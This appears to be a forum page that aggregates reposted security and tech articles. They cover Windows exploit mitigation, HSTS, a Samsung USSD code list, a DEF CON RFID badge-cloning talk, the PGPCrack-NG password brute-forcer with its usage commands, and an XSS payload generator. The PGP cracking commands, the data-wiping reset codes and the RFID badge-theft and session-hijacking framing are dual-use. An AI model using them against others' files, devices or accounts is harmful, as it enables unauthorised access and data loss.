Everything posted by Nytro

  1. Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released

December 20th, 2013, 08:35 GMT · By Silviu Stahie

Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) has been released and is now available for download and testing. We prepared a screenshot tour to get a sneak peek at the new operating system.

The best news for fans of Ubuntu GNOME is that 14.04 will include a number of GNOME applications from the 3.10 stack. The GNOME Classic session has also been included; to try it, users just have to choose it from the Sessions option on the login screen.

“The Alpha 1 Trusty Tahr snapshot includes the 3.12.0.7 Ubuntu Linux kernel, which is based on the upstream v3.12.4 Linux kernel. The 3.12 release contains improvements to the dynamic tick code, support infrastructure for DRM render nodes, TSO sizing and the FQ scheduler in the network layer, support for user namespaces in the XFS filesystem, multithreaded RAID5 in the MD subsystem, and more,” reads the official announcement. Check it out for more details about this release.

Download Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) right now from Softpedia. Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only.

Source: Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released – Screenshot Tour
  2. Exploit Protection for Microsoft Windows

By Guest Writer, posted 13 Dec 2013 at 05:52AM

Software exploits are an attack technique used by attackers to silently install various malware – such as Trojans or backdoors – on a user’s computer, without requiring social engineering to trick the victim into manually running a malicious program. Malware installation through an exploit is invisible to the user and gives attackers an undeniable advantage. Exploits attempt to use vulnerabilities in particular operating system or application components in order to allow malware to execute.

In our previous blog post, titled Solutions to current antivirus challenges, we discussed several methods by which security companies can tackle the exploit problem. In this post, we provide more detail on the most exploited applications on Microsoft Windows platforms and advise a few steps users can (and should) take to further strengthen their defenses.

Exploitation Targets

The following applications are the ones most targeted by attackers through exploitation:

  • Web browsers (Microsoft Internet Explorer, Google Chrome, Apple Safari, Mozilla Firefox and others)
  • Plug-ins for browsers (Adobe Flash Player, Oracle Java, Microsoft Silverlight)
  • The Windows operating system itself – notably the Win32 subsystem driver, win32k.sys
  • Adobe Reader and Adobe Acrobat
  • Other specific applications

Different types of exploits are used in different attack scenarios. One of the most dangerous scenarios for an everyday user is the use of exploits by attackers to remotely install code into the operating system. In such cases, we usually find that the user has visited a compromised web resource and their system has been invisibly infected by malicious code (an attack often referred to as a “drive-by download”).
If your computer is running a version of software such as a web browser or browser plug-ins that is vulnerable to exploitation, and the software vendor has not yet provided a mitigation, the chances of your system becoming infected with malware are very high.

In specific targeted attacks, or attacks like a “watering hole” attack, where the attacker plants the exploit code on websites visited by the victim, the culprit can use zero-day (0-day) vulnerabilities in software or the operating system. Zero-day vulnerabilities are those that have not been patched by the vendor at the time they are being exploited by attackers.

Another common technique used in targeted attacks is to send the victim a PDF document “equipped” with an exploit. Social engineering is also often used, for example by selecting a filename and document content in such a way that the victim is likely to open it. While PDFs are first and foremost document files, Adobe has extended the file format to maximize its data exchange functionality by allowing scripting and the embedding of various objects into files, and this can be exploited by an attacker. While most PDF files are safe, some can be dangerous, especially if obtained from unreliable sources. When such a document is opened in a vulnerable PDF reader, the exploit code triggers the malicious payload (such as installation of a backdoor) and a decoy document is often opened.

Another target which attackers really love is Adobe Flash Player, as this plug-in is used for playback of content in all the different browsers. Like other software from Adobe, Flash Player is updated regularly, as advised by the company’s updates (see Adobe Security Bulletins). Most of these vulnerabilities are of the Remote Code Execution (RCE) type, which indicates that attackers could use such a vulnerability to remotely execute malicious code on a victim’s computer.
In relation to the browser and operating system, Java is a virtual machine (or runtime environment, the JRE) able to execute Java applications. Java applications are platform-independent, making Java a very popular tool: today it is used by more than three billion devices. As with other browser plug-ins, misusing the Java plug-in is attractive to attackers, and given our previous experience of the malicious actions and vulnerabilities with which it is associated, we can say that, as browser plug-ins go, Java represents one of the most dangerous components.

Various components of the Windows operating system itself can also be used by attackers to remotely execute code or elevate privileges. The figure below shows the number of patches various Windows components received during 2013 (up until November).

Chart 1: Number of patches per component

The “Others” category includes vulnerabilities which were fixed for various operating system components (CSRSS, SCM, GDI, Print Spooler, XML Core Services, OLE, NFS, Silverlight, Remote Desktop Client, Active Directory, RPC, Exchange Server).

This ranking shows that Internet Explorer had the largest number of vulnerabilities fixed: more than a hundred, in the course of fourteen updates. Seven of the vulnerabilities had the status ‘being exploited in the wild at the time of patching’: that is, they were being actively exploited by attackers.

The second most-patched component of the operating system is the infamous Windows subsystem driver win32k.sys. Vulnerabilities in this driver are used by attackers to escalate privileges on the system, for example, to bypass restrictions imposed by User Account Control (UAC), a least-privilege mechanism introduced by Microsoft in Windows Vista to reduce the risk of compromise by an attack that requires administrator privileges.
Mitigation techniques

We now look in more detail at the most exploited applications and provide some steps that you can (and should) take to mitigate attacks and further strengthen your defenses.

Windows Operating System

Modern versions of Microsoft Windows – i.e., Windows 7, 8, and 8.1 at the time of writing – have built-in mechanisms which can help to protect users from destructive actions delivered by exploits. Such features became available starting with Windows Vista and have been upgraded in the most recent operating system versions. These features include:

  • DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization): these mechanisms introduce an extra layer of complication when attempting to exploit vulnerabilities in applications and the operating system, through special restrictions on the use of memory which should not be used to execute code, and through the placement of program modules in memory at random addresses.
  • UAC (User Account Control): upgraded from Windows 7 onward, UAC requires confirmation from the user before programs can be run that need to change system settings or create files in system directories.
  • SmartScreen Filter: helps to prevent the downloading of malicious software from the Internet based on the file’s reputation; files known to be malicious or not recognized by the filter are blocked. Originally it was part of Internet Explorer, but with the release of Windows 8 it was built into the operating system, so it now works with all browsers.
  • Special “Enhanced Protected Mode” for Internet Explorer (starting with IE10): on Windows 8 this mode allows the browser’s tabs to run in the context of isolated processes, which are prevented from performing certain actions (a technique also known as sandboxing). On Windows 7 x64 (64-bit) this feature allows IE to run tabs as separate 64-bit processes, which helps to mitigate the common heap-spray method of shellcode distribution.
For more information, refer to the MSDN blog (here and here).

PDF files

In view of the high risks posed by the use of PDF documents from unsafe sources, and given the low awareness of many users and their reluctance to protect themselves adequately, modern versions of Adobe Reader have a special “Protected Mode” (also referred to as sandboxing) for viewing documents. When using this mode, code from the PDF file is prevented from executing certain potentially dangerous functions.

Figure 2: “Sandbox” mode options for Adobe Reader can be enabled through Edit -> Preferences -> Security (Enhanced).

By default, Protected Mode is turned off. Even with the option Enable Protected Mode at startup active, sandbox mode stays turned off while the Protected Mode setting is set to “Disabled”. Accordingly, after installation it is strongly recommended that you turn this setting on, applying it to “Files From Potentially Unsafe Locations” or, even better, “All files”. Please note that when you turn on protected view, Adobe Reader disables several features which can be used in PDF files. Therefore, when you open a file, you may receive a tooltip alert advising you that protected mode is active.

Figure 3: Tooltip which indicates active protected mode.

If you are sure about the origin and safety of the file, you can activate all of its functions by pressing the appropriate button.

Adobe Flash Player

Adobe, together with the manufacturers of web browsers, has made available special features and protective mechanisms to defend against exploits that target the Flash Player plug-in. Browsers such as Microsoft Internet Explorer (starting with version 10 on Windows 8.0 and later), Google Chrome and Apple Safari (latest version) launch Flash Player in the context of a specially-restricted (i.e. sandboxed) process, limiting the ability of that process to access many system resources and places in the file system, and limiting how it communicates with the network.
Timely updating of the Flash Player plug-in for your browser is very important. Google Chrome and Internet Explorer 10+ are automatically updated with the release of new versions of Flash Player. To check your version of Adobe Flash Player you can use the official Adobe resource. In addition, most browsers support the ability to completely disable the Flash Player plug-in, so as to prohibit the browser from playing such content.

Internet Browsers

At the beginning of this article we mentioned that attackers often rely on delivering malicious code using remote code execution through the browser (drive-by downloads). Regardless of what browser plug-ins are installed, the browser itself may contain a number of vulnerabilities known to the attacker (and possibly not known to the browser vendor). If the vulnerability has been patched by the developer and an update for it is available, the user can install it without worrying that it will be used to compromise the operating system. On the other hand, if the attackers are using a previously unknown vulnerability – in other words, one that has not yet been patched (zero-day) – the situation is more complicated for the user.

Modern browsers and operating systems incorporate special technologies for isolating application processes, creating special restrictions on performing various actions which the browser should not be able to perform. In general, this technique is called sandboxing and it allows users to limit what a process can do. One example of this isolation is the fact that modern browsers (for example, Google Chrome and Internet Explorer) execute tabs as separate processes in the operating system, allowing restricted permissions for executing certain actions in a specific tab as well as maintaining the stability of the browser as a whole: if one of the tabs hangs, the user can terminate it without terminating the other tabs.
Modern versions of Microsoft’s Internet Explorer browser (IE10 and IE11) have a special sandboxing technology called “Enhanced Protected Mode” (EPM). This mode allows you to restrict the activity of a tab process or plug-in and thus make exploitation much more difficult for attackers.

Figure 4: Enhanced Protected Mode option turned on in Internet Explorer settings (available since IE10). On Windows 8+ (IE11) it was turned on by default before applying MS13-088.

EPM has been upgraded for Windows 8. If you are using EPM on Windows 7 x64, this feature causes browser tabs to run as 64-bit processes (on a 64-bit OS, Internet Explorer runs its tabs as 32-bit processes by default). Note that by default EPM is off.

Figure 5: Demonstration of EPM at work on Windows 7 x64 [using Microsoft Process Explorer]. With this option turned on, the browser tab processes run as 64-bit, making them more difficult to use for malicious code installation (or at least harder to attack with heap-spraying).

Starting with Windows 8, Enhanced Protected Mode has been expanded in order to isolate (sandbox) a process’s actions at the operating system level. This technology is called “AppContainer” and allows the maximum possible benefit to be gained from the EPM option. Internet Explorer tab processes with the EPM option active work in AppContainer mode. In addition, on Windows 8 EPM mode was enabled by default (IE11).

Figure 6: EPM implementation in Windows 8. On Windows 7 x64, EPM uses 64-bit processes for IE tabs for mitigation, instead of AppContainer.

Note that before November Patch Tuesday 2013, which included the MS13-088 update (Cumulative Security Update for Internet Explorer: November 12, 2013), Microsoft kept EPM as the default setting for IE11 on Windows 8+. That update, however, disables EPM as the default setting, so if you now reset advanced IE settings to their initial state (the “Restore advanced settings” option), EPM will be turned off by default.
Google Chrome, like Internet Explorer, has special features to mitigate drive-by download attacks. But unlike Internet Explorer, sandboxing mode in Chrome is always active and requires no additional action by the user to launch it. This feature of Chrome means that tab processes work with restricted privileges, which does not allow them to perform various system actions.

Figure 7: Sandboxing mode as implemented in Google Chrome. Notice that almost all of the user’s SID groups in the access token have the “Deny” status, restricting access to the system. Additional information can be found on MSDN.

In addition to this mode, Google Chrome is able to block malicious URLs or websites which have been blacklisted by Google because of malicious actions (Google Safe Browsing). This feature is similar to Internet Explorer’s SmartScreen.

Figure 8: Google Safe Browsing in Google Chrome blocking a suspicious webpage.

Java

When you use Java on Windows, its security settings can be changed using the control panel applet. In addition, the latest version contains security settings which allow you to configure the environment more precisely, allowing only trusted applications to run.

Figure 9: Options for updating Java.

To completely disable Java in all browsers used on the system, deselect the option “Enable Java content in the browser” in the Java settings.

Figure 10: Java setting to disable its use in all browsers.

EMET

Microsoft has released a free tool to help users protect the operating system from the malicious actions used in exploits.

Figure 11: EMET interface.

The Enhanced Mitigation Experience Toolkit (EMET) uses preventive methods to block various actions typical of exploits and to protect applications from attacks.
Although Windows 7 and Windows 8 have built-in DEP and ASLR options, which are enabled by default and intended to mitigate the effects of exploitation, EMET introduces new features for blocking the actions of exploits and enables DEP or ASLR for specified processes (increasing system protection on older versions of the OS). This tool must be configured separately for each application: in other words, to protect an application using this tool, you need to include that specific application in the list. There is also a list of applications for which EMET is enabled by default, for example the Internet Explorer browser, Java and Microsoft Office. It’s a good idea to add your favorite browser and Skype to the list.

Operating System Updates

Keeping your operating system and installed software promptly updated and patched is good practice, because vendors regularly use patches and updates to address emerging vulnerabilities. Note that Windows 7 and 8 have the ability to automatically deliver updates to the user by default. You can also check for updates through the Windows Control Panel as shown below.

Figure 12: Windows Update

Generic Exploit Blocking

So far, we have looked at blocking exploits that are specific to the operating system or the applications you are using. You may also want to look at blocking exploits in general, and you may be able to turn to your security software for this. For example, ESET introduced a feature called the Exploit Blocker in the seventh generation of its anti-malware programs, ESET Smart Security and ESET NOD32 Antivirus. The Exploit Blocker is a proactive mechanism that works by analyzing suspicious program behavior and generically detecting signs of exploitation, regardless of the specific vulnerability that was used.

Figure 1: ESET Exploit Blocker option turned on in HIPS settings.
Conclusion

Any operating system or program which is widely used will be studied by attackers for vulnerabilities to exploit for illicit purposes and financial gain. As we have shown above, Adobe, Google and Microsoft have taken steps to make these types of attacks against their software more difficult. However, no single protection technique can be 100% effective against determined adversaries, and users have to remain vigilant about patching their operating systems and applications. Since some vendors update their software on a monthly basis, or even less frequently, it is important to use (and keep updated) anti-malware software which blocks exploits.

This article was contributed by Artem Baranov, Lead Virus Analyst for ESET’s Russian distributor.

Author: Guest Writer, We Live Security

Source: Exploit Protection for Microsoft Windows
  3. HSTS – The missing link in Transport Layer Security

Posted on November 30, 2013 by Scott Helme

HTTP Strict Transport Security (HSTS) is a policy mechanism that allows a web server to enforce the use of TLS in a compliant User Agent (UA), such as a web browser. HSTS allows for a more effective implementation of TLS by ensuring all communication takes place over a secure transport layer on the client side. Most notably, HSTS mitigates variants of man in the middle (MiTM) attacks where TLS can be stripped out of communications with a server, leaving a user vulnerable to further risk.

Introduction

In a previous blog I demonstrated using SSLstrip to MiTM SSL and the dangers it posed. Once installed as a MiTM, SSLstrip will connect to a server on behalf of the victim and communicate using HTTPS. The server is satisfied with the secure communication to the attacker, who then transparently forwards all data to the victim using HTTP. This is possible because the victim does not enforce the use of TLS and either typed in twitter.com and the browser defaulted to http://, or they were using a bookmark or link that contained http://. Once Twitter receives the request it issues a redirect back to the victim’s browser pointing to the https:// URL. Because all of this is done using HTTP, the communications are vulnerable to being intercepted and modified by SSLstrip. Crucially, the user receives no warnings during the attack and can’t verify whether they should be using https://. HSTS mitigates this threat by providing an option to enforce the use of TLS in the browser, which prevents the user navigating to the site using http://.

Implementing HSTS

In order to implement HSTS, a host must declare to a UA that it is a HSTS Host by issuing a HSTS Policy. This is done with the addition of the HTTP response header 'Strict-Transport-Security: max-age=31536000'.
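The header itself is trivial to emit. As a minimal, illustrative sketch (names are my own; in a real deployment you would set this header in your web server or framework configuration, and it must be served over HTTPS, since compliant UAs ignore it over plain HTTP), here is a toy Python handler that attaches the policy header, plus a client reading it back:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading
import urllib.request

class HSTSHandler(BaseHTTPRequestHandler):
    """Toy handler that declares a HSTS Policy on every response."""

    def do_GET(self):
        self.send_response(200)
        # Ask the UA to treat this host as a HSTS Host for one year
        # (31536000 seconds).
        self.send_header("Strict-Transport-Security", "max-age=31536000")
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"hello")

    def log_message(self, *args):
        pass  # keep the demo quiet

# Bind to an ephemeral port and serve in a background thread.
server = HTTPServer(("127.0.0.1", 0), HSTSHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

resp = urllib.request.urlopen("http://127.0.0.1:%d/" % server.server_port)
hsts_header = resp.headers["Strict-Transport-Security"]
print(hsts_header)  # max-age=31536000
server.shutdown()
```

Note again that this demo speaks plain HTTP only to make the header visible; a UA receiving it this way would (correctly) discard it.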
The max-age directive is required and can be any value from 0 upwards; it is the number of seconds after receiving the policy that the UA is to treat the host issuing it as a HSTS Host. It’s worth noting that a max-age directive value of 0 informs the UA to cease treating the host that issued it as a HSTS Host and to remove all policy; it does not imply an infinite max-age value. There is also an optional includeSubDomains directive that can be included at the discretion of the host, such as 'Strict-Transport-Security: max-age=31536000; includeSubDomains'. This would, as expected, inform the UA that all subdomains are to be treated as HSTS Hosts also.

Twitter’s HSTS Policy

The HSTS response header should only be sent over a secure transport layer, and UAs should ignore this header if it is received over HTTP. This is primarily because an attacker running a MiTM attack could maliciously strip out or inject this header into a HTTP response, causing undesired behaviour. This does, however, present a very slim window of opportunity for an attacker in a targeted attack. Upon a user’s very first interaction with Twitter, the browser will have no knowledge of a HSTS Policy for the host. This will result in the first communication taking place over HTTP and not HTTPS. Once Twitter receives the request and replies with a redirect to a HTTPS version of the site, still using HTTP, an attacker could simply effect a MiTM attack against the victim as they would before. The viability of this form of attack has, however, been tremendously reduced overall. The only opportunity the attacker now has is to be set up and prepared to intercept the very first communication ever with the host, or to wait until the HSTS policy expires after the victim has had no further communication with the host for the duration of the max-age directive.
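A compliant UA has to pick these directives apart when it receives the header. A small sketch of that parsing in Python (an approximation for illustration, not the exact grammar from the HSTS specification):

```python
def parse_hsts(header_value):
    """Parse a Strict-Transport-Security header value.

    Returns (max_age, include_subdomains), or None if the required
    max-age directive is missing or malformed. A max-age of 0 is a
    valid value that tells the UA to forget the host's policy.
    """
    max_age = None
    include_subdomains = False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(value.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            include_subdomains = True
    if max_age is None:
        return None  # max-age is a required directive
    return max_age, include_subdomains

print(parse_hsts("max-age=31536000; includeSubDomains"))  # (31536000, True)
print(parse_hsts("max-age=0"))                            # (0, False)
```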
HSTS Header sent via HTTPS

No HSTS Header sent via HTTP

Once the user has initiated communications with a host that declares a valid HSTS Policy, the UA will consider the host to be a HSTS Host for the duration of max-age and store the policy. During this time the UA will afford the user the following protections:

1. UAs transform insecure URI references to an HSTS Host into secure URI references before dereferencing them.
2. The UA terminates any secure transport connection attempts upon any and all secure transport errors or warnings.

(source)

Point 1 means that once Twitter has been accepted by the UA as a HSTS Host, the UA will replace any reference to http:// with https:// where the host is twitter.com (and its subdomains, if specified) before it sends the request. This includes links found on any webpage that use http://, shortcuts or bookmarks that may specify http://, and even user input such as the address bar. Even if http:// is explicitly defined as the protocol of choice, the UA will enforce https://.

Point 2 is also important, if not quite as important as point 1. By terminating the connection as soon as a warning or error message is triggered, the UA prevents the user from clicking through it. Clicking through commonly happens when the user does not understand what the message is saying, or because they are not concerned about the security of the connection. Many attacks depend on the poor manner in which users are informed of potential risk and the poor response from users to such warnings. Simply terminating the connection whenever there is cause for uncertainty provides the highest possible level of protection to the user. It even stops you accidentally clicking through an error message!
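Protection 1 can be modelled with a tiny policy cache. Below is a toy Python `HSTSStore` (entirely illustrative – real browsers implement this natively) that remembers hosts, honours max-age expiry and includeSubDomains, and upgrades http:// references before they would be dereferenced:

```python
import time
from urllib.parse import urlsplit, urlunsplit

class HSTSStore:
    """Toy model of a UA's HSTS policy cache."""

    def __init__(self):
        self._policies = {}  # host -> (expiry timestamp, includeSubDomains)

    def note_policy(self, host, max_age, include_subdomains=False):
        if max_age == 0:
            self._policies.pop(host, None)  # max-age=0 removes the policy
        else:
            self._policies[host] = (time.time() + max_age, include_subdomains)

    def is_hsts_host(self, host):
        now = time.time()
        for known, (expiry, subs) in self._policies.items():
            if expiry < now:
                continue  # policy has expired
            if host == known or (subs and host.endswith("." + known)):
                return True
        return False

    def rewrite(self, url):
        """Transform an insecure URI reference into a secure one (protection 1)."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_hsts_host(parts.hostname):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url

store = HSTSStore()
store.note_policy("twitter.com", 31536000, include_subdomains=True)
print(store.rewrite("http://twitter.com/home"))     # https://twitter.com/home
print(store.rewrite("http://api.twitter.com/1.1"))  # https://api.twitter.com/1.1
print(store.rewrite("http://example.com/"))         # http://example.com/
```

Hosts without a stored (and unexpired) policy are left untouched, which is exactly the first-visit window described above.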
So, once a user has a valid HSTS Policy in place, their request to http://twitter.com should go from something like this:

Initial request uses HTTP with no HSTS policy enforced

To something like this instead:

All requests use HTTPS when HSTS is enforced

This can also be verified using the Chrome Developer Tools. Open a new tab, click the Chrome Menu in the top right, then select Tools -> Developer Tools and open the Network tab. Now navigate to http://twitter.com (you must have visited the site before). You can see the initial request that would have gone to http://twitter.com is not sent, and the browser immediately replaces it with a request to https://twitter.com instead.

Request using HTTP is not sent

HTTP request replaced with HTTPS equivalent

HSTS In Practice

Whilst not yet widely deployed, HSTS has started to make a more widespread appearance since the specification was published in Nov 2012. Below you can see that both Twitter and Facebook have the HSTS response header set, though Facebook doesn’t appear to have a very long max-age value.

Twitter:

Facebook:

Out of interest I decided to check a selection of websites for high street banks and see if any had yet implemented a HSTS Policy. Having checked Barclays, Halifax, HSBC, Nationwide, Natwest, RBS, Santander and Yorkshire Bank, I was disappointed to find that none had yet implemented a HSTS Policy, and some of them even have a dedicated online banking domain name.

Preloaded HSTS

It is also possible for a browser to ship with a preloaded list of HSTS Hosts. The Chrome and Firefox browsers both feature a built-in list of sites that will always be treated as HSTS Hosts regardless of the presence of the HSTS response header. Websites can opt in to be included in the list of preloaded hosts and you can view the Chromium source to see all the hosts already included. For sites preloaded in the browser there is no state in which communications will take place that do not travel over a secure transport layer.
Whether that is the initial communication, the first communication after wiping the local cache, or any communication after a policy would have expired, the user cannot exchange data using HTTP. The browser will afford the protection of HSTS to the applicable hosts at all times. Unfortunately this solution isn’t really scalable, considering the sheer potential number of sites that could be included. That said, if all financial institutions, government sites, social networks and any other potentially large targets applied to be included, they could mitigate a substantial amount of risk.

Conclusion

HSTS has been a highly anticipated and much-needed solution to the problems of HTTP being the default protocol for a UA and the lack of an ability for a host to reliably enforce secure communications. For any site that issues permanent redirects to HTTPS, the addition of the HSTS response header is a much safer way of enforcing secure communications for compliant UAs. By preventing the UA from sending even the very first request via HTTP, HSTS removes the only opportunity a MiTM has to gain a foothold in a secure transport layer.

Scott.

Short URL: http://scotthel.me/hsts

Source: https://scotthelme.co.uk/hsts-the-missing-link-in-tls/
  4. [REF] List of USSD codes!

by kevhuff

Thought I would compile a list of USSD codes for everyone's reference. I have tested most; if anybody has any to add, please feel free. ****Warning: some of these codes can be harmful (wipe data etc.). I am not responsible for anything you do to your device.**** Some of these codes may lead you to a menu; use the option key (far left soft key) to navigate. Some of the functions may be locked from our use, but I'm still working on how to use these menus more extensively.

Information
  • *#44336# Software Version Info
  • *#1234# View SW Version PDA, CSC, MODEM
  • *#12580*369# SW & HW Info
  • *#197328640# Service Mode
  • *#06# IMEI Number
  • *#1234# Firmware Version
  • *#2222# H/W Version
  • *#8999*8376263# All Versions Together
  • *#272*imei#* Product Code
  • *#*#3264#*#* RAM Version
  • *#92782# Phone Model
  • *#*#9999#*#* Phone/PDA/CSC Info

Testing
  • *#07# Test History
  • *#232339# WLAN Test Mode
  • *#232331# Bluetooth Test Mode
  • *#*#232331#*#* Bluetooth Test
  • *#0842# Vibration Motor Test Mode
  • *#0782# Real Time Clock Test
  • *#0228# ADC Reading
  • *#32489# Ciphering Info
  • *#232337# Bluetooth Address
  • *#0673# Audio Test Mode
  • *#0*# General Test Mode
  • *#3214789650# LBS Test Mode
  • *#0289# Melody Test Mode
  • *#0589# Light Sensor Test Mode
  • *#0588# Proximity Sensor Test Mode
  • *#7353# Quick Test Menu
  • *#8999*8378# Test Menu
  • *#*#0588#*#* Proximity Sensor Test
  • *#*#2664#*#* Touch Screen Test
  • *#*#0842#*#* Vibration Test

Network
  • *7465625*638*# Configure Network Lock MCC/MNC
  • #7465625*638*# Insert Network Lock Keycode
  • *7465625*782*# Configure Network Lock NSP
  • #7465625*782*# Insert Partial Network Lock Keycode
  • *7465625*77*# Insert Network Lock Keycode SP
  • #7465625*77*# Insert Operator Lock Keycode
  • *7465625*27*# Insert Network Lock Keycode NSP/CP
  • #7465625*27*# Insert Content Provider Keycode
  • *#7465625# View Phone Lock Status
  • *#232338# WLAN MAC Address
  • *#526# WLAN Engineering Mode – runs WLAN tests (same as below)
  • *#528# WLAN Engineering Mode
  • *#2263# RF Band Selection – not sure about this one, appears to be locked
  • *#301279# HSDPA/HSUPA Control Menu – change HSDPA classes (opt. 1-5)

Tools/Misc.
  • *#*#1111#*#* Service Mode
  • #273283*255*663282*# Data Create SD Card
  • *#4777*8665# GPSR Tool
  • *#4238378# GCF Configuration
  • *#1575# GPS Control Menu
  • *#9090# Diagnostic Configuration
  • *#7284# USB I2C Mode Control – mount to USB for storage/modem
  • *#872564# USB Logging Control
  • *#9900# System Dump Mode – can dump logs for debugging
  • *#34971539# Camera Firmware Update
  • *#7412365# Camera Firmware Menu
  • *#273283*255*3282*# Data Create Menu – change SMS, MMS, voice, contact limits
  • *2767*4387264636# Sellout SMS / PCODE View
  • *#3282*727336*# Data Usage Status
  • *#*#8255#*#* Show GTalk Service Monitor – great source of info
  • *#3214789# GCF Mode Status
  • *#0283# Audio Loopback Control
  • #7594# Remap Shutdown to End Call TSK
  • *#272886# Auto Answer Selection

****SYSTEM**** USE CAUTION
  • *#7780# Factory Reset
  • *2767*3855# Full Factory Reset
  • *#*#7780#*#* Factory Data Reset
  • *#745# RIL Dump Menu
  • *#746# Debug Dump Menu
  • *#9900# System Dump Mode
  • *#8736364# OTA Update Menu
  • *#2663# TSP / TSK Firmware Update
  • *#03# NAND Flash S/N

BAM!!!!

Source: [REF] List of USSD codes! [updated 10-30] - xda-developers
  5. Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard

Description: Have you ever attended an RFID hacking presentation and walked away with more questions than answers? This talk will finally provide practical guidance on how RFID proximity badge systems work. We'll cover what you'll need to build out your own RFID physical penetration toolkit, and how to easily use an Arduino microcontroller to weaponize commercial RFID badge readers — turning them into custom, long-range RFID hacking tools.

This presentation will NOT weigh you down with theoretical details, discussions of radio frequencies and modulation schemes, or talk of inductive coupling. It WILL serve as a practical guide for penetration testers to understand the attack tools and techniques available to them for stealing and using RFID proximity badge information to gain unauthorized access to buildings and other secure areas.

Schematics and Arduino code will be released, and 100 lucky audience members will receive a custom PCB they can insert into almost any commercial RFID reader to steal badge info and conveniently save it to a text file on a microSD card for later use (such as badge cloning). This solution will allow you to read cards from up to 3 feet away, a significant improvement over the few-centimeter range of common RFID hacking tools.
Some of the topics we will explore are:

- Overview of best RFID hacking tools available to get for your toolkit
- Stealing RFID proximity badge info from unsuspecting passers-by
- Replaying RFID badge info and creating fake cloned cards
- Brute-forcing higher privileged badge numbers to gain data center access
- Attacking badge readers and controllers directly
- Planting PwnPlugs, Raspberry Pis, and similar devices as physical backdoors to maintain internal network access
- Creating custom RFID hacking tools using the Arduino
- Defending yourself from RFID hacking threats

This DEMO-rich presentation will benefit both newcomers and seasoned professionals of the physical penetration testing field.

Francis Brown (@security_snacks) CISA, CISSP, MCSE, is a Managing Partner at Bishop Fox (formerly Stach & Liu), a security consulting firm providing IT security services to the Fortune 1000 and global financial institutions as well as U.S. and foreign governments. Before joining Bishop Fox, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients. Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, RSA, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications. Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation, C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques.
https://www.facebook.com/BishopFoxConsulting https://twitter.com/security_snacks For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard
6. PGPCrack-NG

PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files. It is a replacement for the long-dead PGPCrack.

On Fedora 19, run sudo yum install libassuan-devel -y. On Ubuntu, run sudo apt-get install libpth-dev libbz2-dev libassuan-dev. Compile using make. You might need to edit the -I/usr/include/libassuan2 part in the Makefile.

Run:

cat ~/magnum-jumbo/run/password.lst | ./PGPCrack-NG <PGP file>
john -i -stdout | ./PGPCrack-NG <PGP file>

Speed: > 1330 passwords / second on an AMD X3 720 CPU @ 2.8GHz (using a single core).

Sursa si download: https://github.com/kholia/PGPCrack-NG
7. xssless – Automatic XSS Payload Generator

After working with more and more complex JavaScript payloads for XSS, I realized that most of the work I was doing was unnecessary! I scraped together some snippets from my Metafidv2 project and created “xssless”, an automated XSS payload generator. This tool is sure to save some time on more complex sites that make use of tons of CSRF tokens and other annoying tricks. Psst! If you already understand all of this stuff and don’t want to read this post click here for the github link.

The XSS Vulnerability

Once you have your initial XSS vulnerability found you’re basically there! Now you can do evil things like session hijacking and much more! But wait, what if the site is extra secure and locks you out if you use the same session token from a different IP address? Does this mean your newly found XSS is useless? Of course not!

XSS Worms & JavaScript Payloads

Remember, if you can execute JavaScript in the user’s browser you can do anything the user’s browser can do. This means as long as you’re obeying the same-origin policy, you’re good to go! How? JavaScript payloads of course! Not only are JavaScript payloads real, they are quite dangerous; people often write off XSS as a ‘low priority’ issue in security. This is simply not true, and I have to imagine this attitude comes from a lack of amazement at the casual JavaScript popup alerts with session cookies as the message. Lest we forget how powerful the Samy worm was, propagating to over a million accounts and running MySpace’s servers into the ground. This was one of the first big displays of just how powerful XSS could be.

Building Complex Payloads

Building payloads can be a real pain: custom coding every POST/GET request and parsing CSRF tokens, all while debugging to ensure it works. After building a rather complex payload I realized this is pointless; why couldn’t a script do the same?
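To make that pain concrete, here is the kind of boilerplate you end up hand-writing for every request when building a payload manually (a hypothetical Python sketch of what xssless automates; the csrf_token field name is invented, real sites vary):

```python
import re

# Hypothetical sketch: scrape a CSRF token out of a form page's HTML so the
# next forged request can include it. Doing this by hand for every request
# in a multi-step payload is exactly the busywork xssless automates.
def extract_csrf_token(html):
    match = re.search(r'<input[^>]*name="csrf_token"[^>]*value="([^"]+)"', html)
    return match.group(1) if match else None

page = '<form><input type="hidden" name="csrf_token" value="deadbeef42"></form>'
print(extract_csrf_token(page))  # deadbeef42
```

In a real payload the same token-scraping logic has to run inside the victim's browser in JavaScript, once per protected request, which is why generating it from recorded traffic saves so much time.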
xssless

Work smart, not hard: using xssless you can automatically generate payloads for any site quickly and efficiently. xssless generates payloads from Burp proxy exported requests, meaning you perform your web actions in the browser through Burp and then export them into xssless.

An Example Scenario

Imagine we had an XSS in reddit.com; of course we want to use this cool new exploit (because we lack morality and this is an example, so bite me). We fire up Burp and set Firefox to use it as a proxy, then we just perform the web action we want to make a payload for.

...

